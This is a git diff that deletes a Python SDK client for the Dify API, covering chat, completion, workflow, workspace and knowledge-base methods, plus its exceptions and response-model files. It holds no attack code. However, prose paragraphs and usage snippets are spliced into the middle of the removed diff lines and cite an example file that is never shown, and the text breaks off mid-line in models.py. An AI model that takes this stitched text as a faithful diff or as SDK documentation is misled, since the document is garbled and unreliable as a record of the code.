get_app_info(self): - """Get basic application information including name, description, tags, and mode.""" - return self._send_request("GET", "/info") - - def get_app_site_info(self): - """Get application site information.""" - return self._send_request("GET", "/site") - - def get_file_preview(self, file_id: str): - """Get file preview by file ID.""" - return self._send_request("GET", f"/files/{file_id}/preview") - - # App Configuration APIs - def get_app_site_config(self, app_id: str): - """Get app site configuration. - - Args: - app_id: ID of the app - - Returns: - App site configuration - """ - url = f"/apps/{app_id}/site/config" - return self._send_request("GET", url) - - def update_app_site_config(self, app_id: str, config_data: Dict[str, Any]): - """Update app site configuration. 
- - Args: - app_id: ID of the app - config_data: Configuration data to update - - Returns: - Updated app site configuration - """ - url = f"/apps/{app_id}/site/config" - return self._send_request("PUT", url, json=config_data) - - def get_app_api_tokens(self, app_id: str): - """Get API tokens for an app. - - Args: - app_id: ID of the app - - Returns: - List of API tokens - """ - url = f"/apps/{app_id}/api-tokens" - return self._send_request("GET", url) - - def create_app_api_token(self, app_id: str, name: str, description: str | None = None): - """Create a new API token for an app. - - Args: - app_id: ID of the app - name: Name for the API token - description: Description for the API token (optional) - - Returns: - Created API token information - """ - data = {"name": name, "description": description} - url = f"/apps/{app_id}/api-tokens" - return self._send_request("POST", url, json=data) - - def delete_app_api_token(self, app_id: str, token_id: str): - """Delete an API token. - - Args: - app_id: ID of the app - token_id: ID of the token to delete - - Returns: - Deletion result - """ - url = f"/apps/{app_id}/api-tokens/{token_id}" - return self._send_request("DELETE", url) - - -class CompletionClient(DifyClient): - def create_completion_message( - self, - inputs: dict, - response_mode: Literal["blocking", "streaming"], - user: str, - files: Dict[str, Any] | None = None, - ): - # Validate parameters - if not isinstance(inputs, dict): - raise ValidationError("inputs must be a dictionary") - if response_mode not in ["blocking", "streaming"]: - raise ValidationError("response_mode must be 'blocking' or 'streaming'") - - self._validate_params(inputs=inputs, response_mode=response_mode, user=user) - - data = { - "inputs": inputs, - "response_mode": response_mode, - "user": user, - "files": files, - } - return self._send_request( - "POST", - "/completion-messages", - data, - stream=(response_mode == "streaming"), - ) - - -class ChatClient(DifyClient): - def create_chat_message( - self, - inputs: dict, - query: str, - user: str, - response_mode: Literal["blocking", "streaming"] = "blocking", - conversation_id: str | None = None, - files: Dict[str, Any] | None = None, - ): - # Validate parameters - if not isinstance(inputs, dict): - raise ValidationError("inputs must be a dictionary") - if not isinstance(query, str) or not query.strip(): - raise ValidationError("query must be a non-empty string") - if response_mode not in ["blocking", "streaming"]: - raise ValidationError("response_mode must be 'blocking' or 'streaming'") - - self._validate_params(inputs=inputs, query=query, user=user, response_mode=response_mode) - - data = { - "inputs": inputs, - "query": query, - "user": user, - "response_mode": response_mode, - "files": files, - } - if conversation_id: - data["conversation_id"] = conversation_id - - return self._send_request( - "POST", - "/chat-messages", - data, - stream=(response_mode == "streaming"), - ) - - def get_suggested(self, message_id: str, user: str): - params = {"user": user} - return self._send_request("GET", f"/messages/{message_id}/suggested", params=params) - - def stop_message(self, task_id: str, user: str): - data = {"user": user} - return self._send_request("POST", f"/chat-messages/{task_id}/stop", data) - - def get_conversations( - self, - user: str, - last_id: str | None = None, - limit: int | None = None, - pinned: bool | None = None, - ): - params = {"user": user, "last_id": last_id, "limit": limit, "pinned": pinned} - return self._send_request("GET", "/conversations", 
params=params) - - def get_conversation_messages( - self, - user: str, - conversation_id: str | None = None, - first_id: str | None = None, - limit: int | None = None, - ): - params = {"user": user} - - if conversation_id: - params["conversation_id"] = conversation_id - if first_id: - params["first_id"] = first_id - if limit: - params["limit"] = limit - - return self._send_request("GET", "/messages", params=params) - - def rename_conversation(self, conversation_id: str, name: str, auto_generate: bool, user: str): - data = {"name": name, "auto_generate": auto_generate, "user": user} - return self._send_request("POST", f"/conversations/{conversation_id}/name", data) - - def delete_conversation(self, conversation_id: str, user: str): - data = {"user": user} - return self._send_request("DELETE", f"/conversations/{conversation_id}", data) - - def audio_to_text(self, audio_file: Union[IO[bytes], tuple], user: str): - data = {"user": user} - files = {"file": audio_file} - return self._send_request_with_files("POST", "/audio-to-text", data, files) - - # Annotation APIs - def annotation_reply_action( - self, - action: Literal["enable", "disable"], - score_threshold: float, - embedding_provider_name: str, - embedding_model_name: str, - ): - """Enable or disable annotation reply feature.""" - data = { - "score_threshold": score_threshold, - "embedding_provider_name": embedding_provider_name, - "embedding_model_name": embedding_model_name, - } - return self._send_request("POST", f"/apps/annotation-reply/{action}", json=data) - - def get_annotation_reply_status(self, action: Literal["enable", "disable"], job_id: str): - """Get the status of an annotation reply action job.""" - return self._send_request("GET", f"/apps/annotation-reply/{action}/status/{job_id}") - - def list_annotations(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations for the application.""" - params = {"page": page, "limit": limit, "keyword": keyword} - return self._send_request("GET", "/apps/annotations", params=params) - - def create_annotation(self, question: str, answer: str): - """Create a new annotation.""" - data = {"question": question, "answer": answer} - return self._send_request("POST", "/apps/annotations", json=data) - - def update_annotation(self, annotation_id: str, question: str, answer: str): - """Update an existing annotation.""" - data = {"question": question, "answer": answer} - return self._send_request("PUT", f"/apps/annotations/{annotation_id}", json=data) - - def delete_annotation(self, annotation_id: str): - """Delete an annotation.""" - return self._send_request("DELETE", f"/apps/annotations/{annotation_id}") - - # Conversation Variables APIs - def get_conversation_variables(self, conversation_id: str, user: str): - """Get all variables for a specific conversation. - - Args: - conversation_id: The conversation ID to query variables for - user: User identifier - - Returns: - Response from the API containing: - - variables: List of conversation variables with their values - - conversation_id: The conversation ID - """ - params = {"user": user} - url = f"/conversations/{conversation_id}/variables" - return self._send_request("GET", url, params=params) - - def update_conversation_variable(self, conversation_id: str, variable_id: str, value: Any, user: str): - """Update a specific conversation variable. 
- - Args: - conversation_id: The conversation ID - variable_id: The variable ID to update - value: New value for the variable - user: User identifier - - Returns: - Response from the API with updated variable information - """ - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return self._send_request("PUT", url, json=data) - - def delete_annotation_with_response(self, annotation_id: str): - """Delete an annotation with full response handling.""" - url = f"/apps/annotations/{annotation_id}" - return self._send_request("DELETE", url) - - def list_conversation_variables_with_pagination( - self, conversation_id: str, user: str, page: int = 1, limit: int = 20 - ): - """List conversation variables with pagination.""" - params = {"page": page, "limit": limit, "user": user} - url = f"/conversations/{conversation_id}/variables" - return self._send_request("GET", url, params=params) - - def update_conversation_variable_with_response(self, conversation_id: str, variable_id: str, user: str, value: Any): - """Update a conversation variable with full response handling.""" - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return self._send_request("PUT", url, json=data) - - # Enhanced Annotation APIs - def get_annotation_reply_job_status(self, action: str, job_id: str): - """Get status of an annotation reply action job.""" - url = f"/apps/annotation-reply/{action}/status/{job_id}" - return self._send_request("GET", url) - - def list_annotations_with_pagination(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations with pagination.""" - params = {"page": page, "limit": limit, "keyword": keyword} - return self._send_request("GET", "/apps/annotations", params=params) - - def create_annotation_with_response(self, question: str, answer: str): - """Create an annotation with full response handling.""" - data = {"question": question, "answer": answer} - return self._send_request("POST", "/apps/annotations", json=data) - - def update_annotation_with_response(self, annotation_id: str, question: str, answer: str): - """Update an annotation with full response handling.""" - data = {"question": question, "answer": answer} - url = f"/apps/annotations/{annotation_id}" - return self._send_request("PUT", url, json=data) - - -class WorkflowClient(DifyClient): - def run( - self, - inputs: dict, - response_mode: Literal["blocking", "streaming"] = "streaming", - user: str = "abc-123", - ): - data = {"inputs": inputs, "response_mode": response_mode, "user": user} - return self._send_request("POST", "/workflows/run", data) - - def stop(self, task_id: str, user: str): - data = {"user": user} - return self._send_request("POST", f"/workflows/tasks/{task_id}/stop", data) - - def get_result(self, workflow_run_id: str): - return self._send_request("GET", f"/workflows/run/{workflow_run_id}") - - def get_workflow_logs( - self, - keyword: str | None = None, - status: Literal["succeeded", "failed", "stopped"] | None = None, - page: int = 1, - limit: int = 20, - created_at__before: str | None = None, - created_at__after: str | None = None, - created_by_end_user_session_id: str | None = None, - created_by_account: str | None = None, - ): - """Get workflow execution logs with optional filtering.""" - params = {"page": page, "limit": limit} - if keyword: - params["keyword"] = keyword - if status: - params["status"] = status - if created_at__before: - params["created_at__before"] = created_at__before - if created_at__after: - 
params["created_at__after"] = created_at__after - if created_by_end_user_session_id: - params["created_by_end_user_session_id"] = created_by_end_user_session_id - if created_by_account: - params["created_by_account"] = created_by_account - return self._send_request("GET", "/workflows/logs", params=params) - - def run_specific_workflow( - self, - workflow_id: str, - inputs: dict, - response_mode: Literal["blocking", "streaming"] = "streaming", - user: str = "abc-123", - ): - """Run a specific workflow by workflow ID.""" - data = {"inputs": inputs, "response_mode": response_mode, "user": user} - return self._send_request( - "POST", - f"/workflows/{workflow_id}/run", - data, - stream=(response_mode == "streaming"), - ) - - # Enhanced Workflow APIs - def get_workflow_draft(self, app_id: str): - """Get workflow draft configuration. - - Args: - app_id: ID of the workflow app - - Returns: - Workflow draft configuration - """ - url = f"/apps/{app_id}/workflow/draft" - return self._send_request("GET", url) - - def update_workflow_draft(self, app_id: str, workflow_data: Dict[str, Any]): - """Update workflow draft configuration. - - Args: - app_id: ID of the workflow app - workflow_data: Workflow configuration data - - Returns: - Updated workflow draft - """ - url = f"/apps/{app_id}/workflow/draft" - return self._send_request("PUT", url, json=workflow_data) - - def publish_workflow(self, app_id: str): - """Publish workflow from draft. - - Args: - app_id: ID of the workflow app - - Returns: - Published workflow information - """ - url = f"/apps/{app_id}/workflow/publish" - return self._send_request("POST", url) - - def get_workflow_run_history( - self, - app_id: str, - page: int = 1, - limit: int = 20, - status: Literal["succeeded", "failed", "stopped"] | None = None, - ): - """Get workflow run history. 
- - Args: - app_id: ID of the workflow app - page: Page number (default: 1) - limit: Number of items per page (default: 20) - status: Filter by status (optional) - - Returns: - Paginated workflow run history - """ - params = {"page": page, "limit": limit} - if status: - params["status"] = status - url = f"/apps/{app_id}/workflow/runs" - return self._send_request("GET", url, params=params) - - -class WorkspaceClient(DifyClient): - """Client for workspace-related operations.""" - - def get_available_models(self, model_type: str): - """Get available models by model type.""" - url = f"/workspaces/current/models/model-types/{model_type}" - return self._send_request("GET", url) - - def get_available_models_by_type(self, model_type: str): - """Get available models by model type (enhanced version).""" - url = f"/workspaces/current/models/model-types/{model_type}" - return self._send_request("GET", url) - - def get_model_providers(self): - """Get all model providers.""" - return self._send_request("GET", "/workspaces/current/model-providers") - - def get_model_provider_models(self, provider_name: str): - """Get models for a specific provider.""" - url = f"/workspaces/current/model-providers/{provider_name}/models" - return self._send_request("GET", url) - - def validate_model_provider_credentials(self, provider_name: str, credentials: Dict[str, Any]): - """Validate model provider credentials.""" - url = f"/workspaces/current/model-providers/{provider_name}/credentials/validate" - return self._send_request("POST", url, json=credentials) - - # File Management APIs - def get_file_info(self, file_id: str): - """Get information about a specific file.""" - url = f"/files/{file_id}/info" - return self._send_request("GET", url) - - def get_file_download_url(self, file_id: str): - """Get download URL for a file.""" - url = f"/files/{file_id}/download-url" - return self._send_request("GET", url) - - def delete_file(self, file_id: str): - """Delete a file.""" - url = f"/files/{file_id}" - return self._send_request("DELETE", url) - - -class KnowledgeBaseClient(DifyClient): - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - dataset_id: str | None = None, - ): - """ - Construct a KnowledgeBaseClient object. - - Args: - api_key (str): API key of Dify. - base_url (str, optional): Base URL of Dify API. Defaults to 'https://api.dify.ai/v1'. - dataset_id (str, optional): ID of the dataset. Defaults to None. You don't need this if you just want to - create a new dataset or list datasets; otherwise it must be set. - """ - super().__init__(api_key=api_key, base_url=base_url) - self.dataset_id = dataset_id - - def _get_dataset_id(self): - if self.dataset_id is None: - raise ValueError("dataset_id is not set") - return self.dataset_id - - def create_dataset(self, name: str, **kwargs): - return self._send_request("POST", "/datasets", {"name": name}, **kwargs) - - def list_datasets(self, page: int = 1, page_size: int = 20, **kwargs): - return self._send_request("GET", "/datasets", params={"page": page, "limit": page_size}, **kwargs) - - def create_document_by_text(self, name: str, text: str, extra_params: Dict[str, Any] | None = None, **kwargs): - """ - Create a document by text. - - :param name: Name of the document - :param text: Text content of the document - :param extra_params: extra parameters passed to the API, such as indexing_technique, process_rule. (optional) - e.g. - { - 'indexing_technique': 'high_quality', - 'process_rule': { - 'rules': { - 'pre_processing_rules': [ - {'id': 'remove_extra_spaces', 'enabled': True}, - {'id': 'remove_urls_emails', 'enabled': True} - ], - 'segmentation': { - 'separator': '\n', - 'max_tokens': 500 - } - }, - 'mode': 'custom' - } - } - :return: Response from the API - """ - data = { - "indexing_technique": "high_quality", - "process_rule": {"mode": "automatic"}, - "name": name, - "text": text, - } - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/document/create_by_text" - return self._send_request("POST", url, json=data, **kwargs)
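With `create_document_by_text` in place, the dataset bootstrap flow looks like this. A minimal sketch that mirrors the `advanced_usage.py` example further down; it assumes the create-dataset response carries an `id` field, as that example does.

```python
# Sketch: create a dataset, then seed it with a text document.
from dify_client import KnowledgeBaseClient

kb = KnowledgeBaseClient(api_key="your-api-key")
dataset_id = kb.create_dataset(name="Product FAQ").json().get("id")

# Per-dataset calls require dataset_id (see _get_dataset_id above).
kb = KnowledgeBaseClient(api_key="your-api-key", dataset_id=dataset_id)
doc = kb.create_document_by_text(
    name="faq",
    text="Q: What is Dify? A: A platform for building LLM apps.",
    extra_params={"indexing_technique": "economy"},  # optional override
)
print(doc.json())
```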
def update_document_by_text( - self, - document_id: str, - name: str, - text: str, - extra_params: Dict[str, Any] | None = None, - **kwargs, - ): - """ - Update a document by text. - - :param document_id: ID of the document - :param name: Name of the document - :param text: Text content of the document - :param extra_params: extra parameters passed to the API, such as indexing_technique, process_rule. (optional) - e.g. - { - 'indexing_technique': 'high_quality', - 'process_rule': { - 'rules': { - 'pre_processing_rules': [ - {'id': 'remove_extra_spaces', 'enabled': True}, - {'id': 'remove_urls_emails', 'enabled': True} - ], - 'segmentation': { - 'separator': '\n', - 'max_tokens': 500 - } - }, - 'mode': 'custom' - } - } - :return: Response from the API - """ - data = {"name": name, "text": text} - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/update_by_text" - return self._send_request("POST", url, json=data, **kwargs) - - def create_document_by_file( - self, - file_path: str, - original_document_id: str | None = None, - extra_params: Dict[str, Any] | None = None, - ): - """ - Create a document by file. - - :param file_path: Path to the file - :param original_document_id: pass this ID if you want to replace the original document (optional) - :param extra_params: extra parameters passed to the API, such as indexing_technique, process_rule. (optional) - e.g. - { - 'indexing_technique': 'high_quality', - 'process_rule': { - 'rules': { - 'pre_processing_rules': [ - {'id': 'remove_extra_spaces', 'enabled': True}, - {'id': 'remove_urls_emails', 'enabled': True} - ], - 'segmentation': { - 'separator': '\n', - 'max_tokens': 500 - } - }, - 'mode': 'custom' - } - } - :return: Response from the API - """ - with open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - data = { - "process_rule": {"mode": "automatic"}, - "indexing_technique": "high_quality", - } - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - if original_document_id is not None: - data["original_document_id"] = original_document_id - url = f"/datasets/{self._get_dataset_id()}/document/create_by_file" - return self._send_request_with_files("POST", url, {"data": json.dumps(data)}, files)
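`create_document_by_file` wraps the multipart upload; a sketch of pairing it with `batch_indexing_status` follows. It assumes the create response includes a `batch` id (the `DocumentResponse` model later in this diff has a `batch` field, but the exact payload shape is not pinned down here).

```python
# Sketch: upload a file, then check the indexing batch it started.
from dify_client import KnowledgeBaseClient

kb = KnowledgeBaseClient(api_key="your-api-key", dataset_id="dataset-id-123")
created = kb.create_document_by_file("docs/handbook.pdf").json()

batch_id = created.get("batch")  # assumed response key
if batch_id:
    status = kb.batch_indexing_status(batch_id).json()
    print(status)  # poll until the API reports indexing has completed
```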
def update_document_by_file( - self, - document_id: str, - file_path: str, - extra_params: Dict[str, Any] | None = None, - ): - """ - Update a document by file. - - :param document_id: ID of the document - :param file_path: Path to the file - :param extra_params: extra parameters passed to the API, such as indexing_technique, process_rule. (optional) - e.g. - { - 'indexing_technique': 'high_quality', - 'process_rule': { - 'rules': { - 'pre_processing_rules': [ - {'id': 'remove_extra_spaces', 'enabled': True}, - {'id': 'remove_urls_emails', 'enabled': True} - ], - 'segmentation': { - 'separator': '\n', - 'max_tokens': 500 - } - }, - 'mode': 'custom' - } - } - :return: Response from the API - """ - with open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - data = {} - if extra_params is not None and isinstance(extra_params, dict): - data.update(extra_params) - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/update_by_file" - return self._send_request_with_files("POST", url, {"data": json.dumps(data)}, files) - - def batch_indexing_status(self, batch_id: str, **kwargs): - """ - Get the status of the batch indexing. - - :param batch_id: ID of the batch uploading - :return: Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{batch_id}/indexing-status" - return self._send_request("GET", url, **kwargs) - - def delete_dataset(self): - """ - Delete this dataset. - - :return: Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}" - return self._send_request("DELETE", url) - - def delete_document(self, document_id: str): - """ - Delete a document. - - :param document_id: ID of the document - :return: Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}" - return self._send_request("DELETE", url) - - def list_documents( - self, - page: int | None = None, - page_size: int | None = None, - keyword: str | None = None, - **kwargs, - ): - """ - Get a list of documents in this dataset. - - :return: Response from the API - """ - params = {} - if page is not None: - params["page"] = page - if page_size is not None: - params["limit"] = page_size - if keyword is not None: - params["keyword"] = keyword - url = f"/datasets/{self._get_dataset_id()}/documents" - return self._send_request("GET", url, params=params, **kwargs) - - def add_segments(self, document_id: str, segments: list[dict], **kwargs): - """ - Add segments to a document. - - :param document_id: ID of the document - :param segments: List of segments to add, example: [{"content": "1", "answer": "1", "keyword": ["a"]}] - :return: Response from the API - """ - data = {"segments": segments} - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments" - return self._send_request("POST", url, json=data, **kwargs) - - def query_segments( - self, - document_id: str, - keyword: str | None = None, - status: str | None = None, - **kwargs, - ): - """ - Query segments in this document. - - :param document_id: ID of the document - :param keyword: query keyword, optional - :param status: status of the segment, optional, e.g. completed - :param kwargs: Additional parameters to pass to the API. - Can include a 'params' dict for extra query parameters. - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments" - params = {} - if keyword is not None: - params["keyword"] = keyword - if status is not None: - params["status"] = status - if "params" in kwargs: - params.update(kwargs.pop("params")) - return self._send_request("GET", url, params=params, **kwargs) - - def delete_document_segment(self, document_id: str, segment_id: str): - """ - Delete a segment from a document. 
- - :param document_id: ID of the document - :param segment_id: ID of the segment - :return: Response from the API - """ - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments/{segment_id}" - return self._send_request("DELETE", url) - - def update_document_segment(self, document_id: str, segment_id: str, segment_data: dict, **kwargs): - """ - Update a segment in a document. - - :param document_id: ID of the document - :param segment_id: ID of the segment - :param segment_data: Data of the segment, example: {"content": "1", "answer": "1", "keyword": ["a"], "enabled": True} - :return: Response from the API - """ - data = {"segment": segment_data} - url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments/{segment_id}" - return self._send_request("POST", url, json=data, **kwargs) - - # Advanced Knowledge Base APIs - def hit_testing( - self, - query: str, - retrieval_model: Dict[str, Any] | None = None, - external_retrieval_model: Dict[str, Any] | None = None, - ): - """Perform hit testing on the dataset.""" - data = {"query": query} - if retrieval_model: - data["retrieval_model"] = retrieval_model - if external_retrieval_model: - data["external_retrieval_model"] = external_retrieval_model - url = f"/datasets/{self._get_dataset_id()}/hit-testing" - return self._send_request("POST", url, json=data) - - def get_dataset_metadata(self): - """Get dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata" - return self._send_request("GET", url) - - def create_dataset_metadata(self, metadata_data: Dict[str, Any]): - """Create dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata" - return self._send_request("POST", url, json=metadata_data) - - def update_dataset_metadata(self, metadata_id: str, metadata_data: Dict[str, Any]): - """Update dataset metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata/{metadata_id}" - return self._send_request("PATCH", url, json=metadata_data) - - def get_built_in_metadata(self): - """Get built-in metadata.""" - url = f"/datasets/{self._get_dataset_id()}/metadata/built-in" - return self._send_request("GET", url) - - def manage_built_in_metadata(self, action: str, metadata_data: Dict[str, Any] | None = None): - """Manage built-in metadata with specified action.""" - data = metadata_data or {} - url = f"/datasets/{self._get_dataset_id()}/metadata/built-in/{action}" - return self._send_request("POST", url, json=data) - - def update_documents_metadata(self, operation_data: List[Dict[str, Any]]): - """Update metadata for multiple documents.""" - url = f"/datasets/{self._get_dataset_id()}/documents/metadata" - data = {"operation_data": operation_data} - return self._send_request("POST", url, json=data) - - # Dataset Tags APIs - def list_dataset_tags(self): - """List all dataset tags.""" - return self._send_request("GET", "/datasets/tags") - - def bind_dataset_tags(self, tag_ids: List[str]): - """Bind tags to dataset.""" - data = {"tag_ids": tag_ids, "target_id": self._get_dataset_id()} - return self._send_request("POST", "/datasets/tags/binding", json=data) - - def unbind_dataset_tag(self, tag_id: str): - """Unbind a single tag from dataset.""" - data = {"tag_id": tag_id, "target_id": self._get_dataset_id()} - return self._send_request("POST", "/datasets/tags/unbinding", json=data) - - def get_dataset_tags(self): - """Get tags for current dataset.""" - url = f"/datasets/{self._get_dataset_id()}/tags" - return self._send_request("GET", url)
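The tag helpers above complete the dataset-curation surface; before the RAG pipeline APIs, a retrieval sanity check via `hit_testing` is the natural smoke test. A sketch follows; the `retrieval_model` keys shown are assumptions about the API schema, not something this diff defines.

```python
# Sketch: retrieval hit testing against the bound dataset.
from dify_client import KnowledgeBaseClient

kb = KnowledgeBaseClient(api_key="your-api-key", dataset_id="dataset-id-123")
result = kb.hit_testing(
    query="How do I rotate an API key?",
    retrieval_model={"search_method": "semantic_search", "top_k": 3},  # assumed keys
).json()

for record in result.get("records", []):  # "records" matches HitTestingResponse below
    print(record)
```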
# RAG Pipeline APIs - def get_datasource_plugins(self, is_published: bool = True): - """Get datasource plugins for RAG pipeline.""" - params = {"is_published": is_published} - url = f"/datasets/{self._get_dataset_id()}/pipeline/datasource-plugins" - return self._send_request("GET", url, params=params) - - def run_datasource_node( - self, - node_id: str, - inputs: Dict[str, Any], - datasource_type: str, - is_published: bool = True, - credential_id: str | None = None, - ): - """Run a datasource node in RAG pipeline.""" - data = { - "inputs": inputs, - "datasource_type": datasource_type, - "is_published": is_published, - } - if credential_id: - data["credential_id"] = credential_id - url = f"/datasets/{self._get_dataset_id()}/pipeline/datasource/nodes/{node_id}/run" - return self._send_request("POST", url, json=data, stream=True) - - def run_rag_pipeline( - self, - inputs: Dict[str, Any], - datasource_type: str, - datasource_info_list: List[Dict[str, Any]], - start_node_id: str, - is_published: bool = True, - response_mode: Literal["streaming", "blocking"] = "blocking", - ): - """Run RAG pipeline.""" - data = { - "inputs": inputs, - "datasource_type": datasource_type, - "datasource_info_list": datasource_info_list, - "start_node_id": start_node_id, - "is_published": is_published, - "response_mode": response_mode, - } - url = f"/datasets/{self._get_dataset_id()}/pipeline/run" - return self._send_request("POST", url, json=data, stream=response_mode == "streaming") - - def upload_pipeline_file(self, file_path: str): - """Upload file for RAG pipeline.""" - with open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - return self._send_request_with_files("POST", "/datasets/pipeline/file-upload", {}, files) - - # Dataset Management APIs - def get_dataset(self, dataset_id: str | None = None): - """Get detailed information about a specific dataset. - - Args: - dataset_id: Dataset ID (optional, uses current dataset_id if not provided) - - Returns: - Response from the API containing dataset details including: - - name, description, permission - - indexing_technique, embedding_model, embedding_model_provider - - retrieval_model configuration - - document_count, word_count, app_count - - created_at, updated_at - """ - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}" - return self._send_request("GET", url) - - def update_dataset( - self, - dataset_id: str | None = None, - name: str | None = None, - description: str | None = None, - indexing_technique: str | None = None, - embedding_model: str | None = None, - embedding_model_provider: str | None = None, - retrieval_model: Dict[str, Any] | None = None, - **kwargs, - ): - """Update dataset configuration. 
- - Args: - dataset_id: Dataset ID (optional, uses current dataset_id if not provided) - name: New dataset name - description: New dataset description - indexing_technique: Indexing technique ('high_quality' or 'economy') - embedding_model: Embedding model name - embedding_model_provider: Embedding model provider - retrieval_model: Retrieval model configuration dict - **kwargs: Additional parameters to pass to the API - - Returns: - Response from the API with updated dataset information - """ - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}" - - # Build data dictionary with all possible parameters - payload = { - "name": name, - "description": description, - "indexing_technique": indexing_technique, - "embedding_model": embedding_model, - "embedding_model_provider": embedding_model_provider, - "retrieval_model": retrieval_model, - } - - # Filter out None values and merge with additional kwargs - data = {k: v for k, v in payload.items() if v is not None} - data.update(kwargs) - - return self._send_request("PATCH", url, json=data) - - def batch_update_document_status( - self, - action: Literal["enable", "disable", "archive", "un_archive"], - document_ids: List[str], - dataset_id: str | None = None, - ): - """Batch update document status (enable/disable/archive/unarchive). - - Args: - action: Action to perform on documents - - 'enable': Enable documents for retrieval - - 'disable': Disable documents from retrieval - - 'archive': Archive documents - - 'un_archive': Unarchive documents - document_ids: List of document IDs to update - dataset_id: Dataset ID (optional, uses current dataset_id if not provided) - - Returns: - Response from the API with operation result - """ - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}/documents/status/{action}" - data = {"document_ids": document_ids} - return self._send_request("PATCH", url, json=data) - - # Enhanced Dataset APIs - def create_dataset_from_template(self, template_name: str, name: str, description: str | None = None): - """Create a dataset from a predefined template. - - Args: - template_name: Name of the template to use - name: Name for the new dataset - description: Description for the dataset (optional) - - Returns: - Created dataset information - """ - data = { - "template_name": template_name, - "name": name, - "description": description, - } - return self._send_request("POST", "/datasets/from-template", json=data) - - def duplicate_dataset(self, dataset_id: str, name: str): - """Duplicate an existing dataset. 
- - Args: - dataset_id: ID of dataset to duplicate - name: Name for duplicated dataset - - Returns: - New dataset information - """ - data = {"name": name} - url = f"/datasets/{dataset_id}/duplicate" - return self._send_request("POST", url, json=data) - - def list_conversation_variables_with_pagination( - self, conversation_id: str, user: str, page: int = 1, limit: int = 20 - ): - """List conversation variables with pagination.""" - params = {"page": page, "limit": limit, "user": user} - url = f"/conversations/{conversation_id}/variables" - return self._send_request("GET", url, params=params) - - def update_conversation_variable_with_response(self, conversation_id: str, variable_id: str, user: str, value: Any): - """Update a conversation variable with full response handling.""" - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return self._send_request("PUT", url, json=data) diff --git a/sdks/python-client/dify_client/exceptions.py b/sdks/python-client/dify_client/exceptions.py deleted file mode 100644 index e7ba2ff4b2..0000000000 --- a/sdks/python-client/dify_client/exceptions.py +++ /dev/null @@ -1,71 +0,0 @@ -"""Custom exceptions for the Dify client.""" - -from typing import Optional, Dict, Any - - -class DifyClientError(Exception): - """Base exception for all Dify client errors.""" - - def __init__(self, message: str, status_code: int | None = None, response: Dict[str, Any] | None = None): - super().__init__(message) - self.message = message - self.status_code = status_code - self.response = response - - -class APIError(DifyClientError): - """Raised when the API returns an error response.""" - - def __init__(self, message: str, status_code: int, response: Dict[str, Any] | None = None): - super().__init__(message, status_code, response) - self.status_code = status_code - - -class AuthenticationError(DifyClientError): - """Raised when authentication fails.""" - - pass - - -class RateLimitError(DifyClientError): - """Raised when rate limit is exceeded.""" - - def __init__(self, message: str = "Rate limit exceeded", retry_after: int | None = None): - super().__init__(message) - self.retry_after = retry_after - - -class ValidationError(DifyClientError): - """Raised when request validation fails.""" - - pass - - -class NetworkError(DifyClientError): - """Raised when network-related errors occur.""" - - pass - - -class TimeoutError(DifyClientError): - """Raised when request times out.""" - - pass - - -class FileUploadError(DifyClientError): - """Raised when file upload fails.""" - - pass - - -class DatasetError(DifyClientError): - """Raised when dataset operations fail.""" - - pass - - -class WorkflowError(DifyClientError): - """Raised when workflow operations fail.""" - - pass diff --git a/sdks/python-client/dify_client/models.py b/sdks/python-client/dify_client/models.py deleted file mode 100644 index 0321e9c3f4..0000000000 --- a/sdks/python-client/dify_client/models.py +++ /dev/null @@ -1,396 +0,0 @@ -"""Response models for the Dify client with proper type hints.""" - -from typing import Optional, List, Dict, Any, Literal, Union -from dataclasses import dataclass, field -from datetime import datetime - - -@dataclass -class BaseResponse: - """Base response model.""" - - success: bool = True - message: str | None = None - - -@dataclass -class ErrorResponse(BaseResponse): - """Error response model.""" - - error_code: str | None = None - details: Dict[str, Any] | None = None - success: bool = False - - -@dataclass -class FileInfo: - 
"""File information model.""" - - id: str - name: str - size: int - mime_type: str - url: str | None = None - created_at: datetime | None = None - - -@dataclass -class MessageResponse(BaseResponse): - """Message response model.""" - - id: str = "" - answer: str = "" - conversation_id: str | None = None - created_at: int | None = None - metadata: Dict[str, Any] | None = None - files: List[Dict[str, Any]] | None = None - - -@dataclass -class ConversationResponse(BaseResponse): - """Conversation response model.""" - - id: str = "" - name: str = "" - inputs: Dict[str, Any] | None = None - status: str | None = None - created_at: int | None = None - updated_at: int | None = None - - -@dataclass -class DatasetResponse(BaseResponse): - """Dataset response model.""" - - id: str = "" - name: str = "" - description: str | None = None - permission: str | None = None - indexing_technique: str | None = None - embedding_model: str | None = None - embedding_model_provider: str | None = None - retrieval_model: Dict[str, Any] | None = None - document_count: int | None = None - word_count: int | None = None - app_count: int | None = None - created_at: int | None = None - updated_at: int | None = None - - -@dataclass -class DocumentResponse(BaseResponse): - """Document response model.""" - - id: str = "" - name: str = "" - data_source_type: str | None = None - data_source_info: Dict[str, Any] | 